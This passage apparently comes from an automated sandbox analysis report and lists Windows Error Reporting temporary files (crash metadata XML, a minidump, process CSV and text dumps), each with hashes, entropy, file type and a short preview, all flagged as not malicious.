                                                                                                                                                                                                                                MD5:36B05397C069D1EF730F9F9EB301E8EB
                                                                                                                                                                                                                                SHA1:63BD79513DF25B004BEC581C35D8726F03FFEDC4
                                                                                                                                                                                                                                SHA-256:516E9667C18ED041C11784CB8660CFC50A4A2E38814A6D45774E178F6C9C9B72
                                                                                                                                                                                                                                SHA-512:FD8059FBB4BDB54448C0F7CB42F7EA66EF81633CE31C04CC42279A9BF6E0D70D74D5E50491445B8DEA6D19F6965F9733A4D43EA566C89B870EBE3BE5483A39BC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.4.8.<./.P.i.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER95BB.tmp.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4782
                                                                                                                                                                                                                                Entropy (8bit):4.535523741718873
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsiJg77aI9xWWpW8VYj5Ym8M4JOB2F6+q8vYBEVvi/ffd:uIjfwI7/37VxJYKf6/ffd
                                                                                                                                                                                                                                MD5:9BB5B66DA21FDA020F10D0DC32EE9044
                                                                                                                                                                                                                                SHA1:61E1C49898A9C713F1623EF5BCA29F0E57FCA3B0
                                                                                                                                                                                                                                SHA-256:956DC0E95E5FDC1E6A10A8ACC1A39F4B3CABB19BDC2138AA35B888BD861C9E3C
                                                                                                                                                                                                                                SHA-512:2E303223A3EF704ACCBEA70B0EE2B1614D93F4B368A11089255E23047E49FDDD18D74A23862C770EC65928032BD69A2F9C856E4CD4AF8400A17304E93B28B5F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="509916" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9618.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8318
                                                                                                                                                                                                                                Entropy (8bit):3.697127677918046
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJgP6IFj6YFV6ugmf8JPWOFpx389bbOsf1MJm:R6lXJo6IFj6Y36ugmf8JPWOSbNf1/
                                                                                                                                                                                                                                MD5:F6CCDAFE408299C1723D9A136731DB3E
                                                                                                                                                                                                                                SHA1:606AB1BED1F297B2DD06373A065A8FA7469D132E
                                                                                                                                                                                                                                SHA-256:A75098D5A516D6E4A786AC231B79A690B1F7B78F84E93B0F19904F3F386BEA9F
                                                                                                                                                                                                                                SHA-512:E3C3416347704A48BEA13F9646EA7D1D51C8A9B80191DFDD4DE8AEF0642FE5F35445B2CC79F68CAD6D9851AA10EE19B7462ACEB0EE2C12444A824CD9E6015578
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.0.8.<./.P.i.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9685.tmp.dmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sat Sep 21 11:34:09 2024, 0x1205a4 type
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):189471
                                                                                                                                                                                                                                Entropy (8bit):3.627346642257434
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:4/Wwdw3GGhVV/jAimYCDYtTLBnuBojRapN4uE2aOESVXJOLTgGWJtHVpDVdAUdrV:4QUTSfBJc4uEqEy0LTgGWvHzDPdrpP
                                                                                                                                                                                                                                MD5:A5B49505BD49F62A6A5E1A5E75B8A9F4
                                                                                                                                                                                                                                SHA1:6ACB88F71E4DC2444B73A34955679BF1F2C59F20
                                                                                                                                                                                                                                SHA-256:AC32C4AE3FE6B7EBB5654A47AB8C545687EC044845A0DB6098073C9A3625C14B
                                                                                                                                                                                                                                SHA-512:05305A2BB3616A691B01685B6D32FFF2D5ED6984BF1147C0BE197A59EF9968542EB797EBF2B7BF01D6B2E8B0C6D7172BF284119984987A3053472D9C587FF9B4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MDMP..a..... .......1..f........................\...(.......$...........$....@..........`.......8...........T...........@%.........................................................................................................eJ......,.......GenuineIntel............T...........(..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER96C3.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):95224
                                                                                                                                                                                                                                Entropy (8bit):3.109612412876996
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:cER7JfwLc1D5Tu9vPCpeHMPWkX3jZGgBoYL4z+xhBRyqAEsfcQTyQXYtTralYmj:cER7JfwLc1D5Tu9vPCpeHMPzX3jZGgBC
                                                                                                                                                                                                                                MD5:D789A9593F5771092683C305B5A9051D
                                                                                                                                                                                                                                SHA1:79990E9AA2FC3CEFD8C234E2DB8711BF0DCA5BED
                                                                                                                                                                                                                                SHA-256:56CE12F189AEE9872C55726EA3C06E8363AC922B769C9F5F516445F96B751CDC
                                                                                                                                                                                                                                SHA-512:91B222A85CA9370A2868E4CD5D92B20AEF49C32C7C1E750D4E5B33CE2F9E00B5EC7F32DBF7E151C1EEC5063F422DCEB6AE85B2035F387A28356AB372DB587A7E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER96E4.tmp.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4636
                                                                                                                                                                                                                                Entropy (8bit):4.443341492894614
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsiJg77aI9xWWpW8VYjEcYm8M4JfuBKFKG+q8oCK2QgLuOLuird:uIjfwI7/37VhJfu6v32Bukuird
                                                                                                                                                                                                                                MD5:2BFD62C3809320E0CD84054DE5ED1667
                                                                                                                                                                                                                                SHA1:6928A150AB6EE7B0264440B545EB923219254FBF
                                                                                                                                                                                                                                SHA-256:C46316F880AD77EB8C1D0003C0817EDCE0D91CBA469BB8F4449FD7E4F44345D1
                                                                                                                                                                                                                                SHA-512:B36ACBA6E844E218E6036232399DCF4CC1573F746A23C0DFD79131185355BDBD07A93261FD38E0712AFF29CB5496C1CD1F2A4040AEF75D7F79419094AFE8EEE5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="509916" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER982B.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):95634
                                                                                                                                                                                                                                Entropy (8bit):3.1096609333078136
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:0IX06zwLA1DcbpU9AuIpeHM2WkX3jZGgBoYL4z+xhBRyqAEsfcQTyQXYV/a9sW9R:0IX06zwLA1DcbpU9AuIpeHM2zX3jZGgU
                                                                                                                                                                                                                                MD5:EBD5ADF7FF9C6677DC2793081D5FF0D4
                                                                                                                                                                                                                                SHA1:DCE41BB8349B268535201EF050CE946D5A8C3686
                                                                                                                                                                                                                                SHA-256:85D5A5C531880D7399319B279488097C83B63206C5CCF3A4618CF862952535FF
                                                                                                                                                                                                                                SHA-512:55CEA02750FA17EA43BC07640A16EABC3A441E4E9034366E3C7F04D34286071D6DE2FB84403CF13410ABAF1DD92681E691E831BFB5825DFF95B6046FB32BDEE1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9965.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.684861324944787
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW395nR0cYcYkcW/HUYEZaqtdi1EfaVpPwtxgKmaJpyMMwZQIJu3:2ZD3997L1AbmaJp3MwZnJu3
                                                                                                                                                                                                                                MD5:BEA598A7E3CD70D25E3854A1187185F1
                                                                                                                                                                                                                                SHA1:45EFD545B57853547AEF67377FED2C10C23C1CA1
                                                                                                                                                                                                                                SHA-256:B238282E27707AB0520E6481CE39D0176BCAD95C3392AAEE590FD71559560280
                                                                                                                                                                                                                                SHA-512:EC40050035BC38B6B87D9EA29F3E453B03E069609E1A2E3B14988535A30020FF48711DE8E65B0C117F63EF98D927A68636BD20B7A56247EFA762503038C74FFE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9983.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8442
                                                                                                                                                                                                                                Entropy (8bit):3.7079728564160788
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJQy/6owT6Yqv6hJgmfEDr9pNm89bS31fsGm:R6lXJF6ou6YC6vgmfSpSFfU
                                                                                                                                                                                                                                MD5:11B3ED3FE7ABCC3CB54ABCF5E47892E7
                                                                                                                                                                                                                                SHA1:65C6CAE68D22E902A196557F9DA4CB98366A8A37
                                                                                                                                                                                                                                SHA-256:5C096C49548DB4B0AB46223B39C8E0825F5073CE0633EBA19D2208AB0A9CFE46
                                                                                                                                                                                                                                SHA-512:4D832C4FDF2212B964BE65F58A236AF2F3CC172A6CFDE2E41E05FDB34D01A7AB102976CFD42DF704A3E33D10CCCA539B0FE8DA870902EF6A0460CFCDF8968528
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.9.6.<./.P.i.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A11.tmp.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4848
                                                                                                                                                                                                                                Entropy (8bit):4.537447273377402
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsiJg77aI9xWWpW8VYj1Ym8M4JSAd6FQO+q8vadE11EeeSX9gd:uIjfwI7/37VJJrAKwE11veSX2d
                                                                                                                                                                                                                                MD5:9BBEE040B12FA8C7D68359611FC569DA
                                                                                                                                                                                                                                SHA1:42D77DA4855EDA5865C6C4D53E110D6C01874A7C
                                                                                                                                                                                                                                SHA-256:B8BE521288A52E159235D0AA8D847E49A6E6BB429F8E67D808450FB95B9E054E
                                                                                                                                                                                                                                SHA-512:A0636AC2A538B6B05F24FC4BF4F250BDE81D06B03E6F96FB3AF5803BA16612234D3FD21D80F2D949D0611494A70C5D29A11FFAFB2DBA94997F5ADECA92B3B082
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="509916" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9ABE.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):96414
                                                                                                                                                                                                                                Entropy (8bit):3.1086098656144063
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:0PCJw7u1YWnpUXVnm8pYHMsWkX3jZGgBoYL4z+xhBRyqAEsfcQTyQXYQpaWC517Q:0PCJw7u1YWnpUXVnm8pYHMszX3jZGgBU
                                                                                                                                                                                                                                MD5:91ECA4DB5A84C16C7A4F9BBD21074F05
                                                                                                                                                                                                                                SHA1:EC2346AFEBF5C7FDD2CC04DEDC15BAA2A5F5AA51
                                                                                                                                                                                                                                SHA-256:A4506A33E34CFD389C9C6EC843A3BB01A1EDB502A083E660AB239EC0B371AA3A
                                                                                                                                                                                                                                SHA-512:3FB97E73466209D38D5C5DDEE8A04262C222A4B473B6ADE804FDF308D3C56D573BF963BB1110D028F5A97B303602F53DB3A3C49019DE07BB7106F48649BDFD34
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
